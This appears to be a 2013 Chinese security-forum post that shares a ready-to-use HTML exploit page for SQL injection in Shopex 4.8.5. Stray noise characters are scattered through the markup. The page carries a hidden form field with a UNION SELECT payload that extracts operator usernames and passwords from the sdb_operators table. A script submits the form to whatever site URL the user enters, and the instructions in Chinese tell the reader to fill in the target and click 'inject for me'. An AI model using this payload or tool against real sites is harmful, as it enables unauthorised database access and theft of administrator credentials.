<center>
' I+ a: r* r8 y' V<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>0 Z8 P/ d! F+ U8 H3 Y
<form action="" method="post" name="submit_url">0 c( g- m3 {' g" }
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
( G6 U# s- S0 M. n1 Z<input type="hidden" name="goods[goods_id]" value="3">$ k ~% }0 W) ]. V
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
" ]" A. o' V) \( M3 w9 y0 S<input type="submit" value="给我注入" onclick=fsubmit()>
) e$ `6 q* X- `8 `4 I( [7 H</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com5 f7 m& T* o$ K) H2 c2 a
2 A% k5 L. B+ X* U3 S<script> " @8 J% w8 n9 U& m
function fsubmit(){ + P- r7 J: a, L+ M
form = document.forms[0];
+ u% _0 H4 h+ t( M7 u9 `6 c- r) x6 A5 tform.action = form.url.value+'/?product-gnotify'; + x' _% p; f8 G
form.submit();
: v/ `" W8 ?8 y. Q/ x) v3 z" d3 \1 M} ! l3 u. a' B8 R C+ ~4 n* {- x+ X, ]7 o
</script>2 A/ |; ~$ F4 _* }2 ^& x$ \* g
|
发表于 2013-1-23 09:20:52
收藏
支持
反对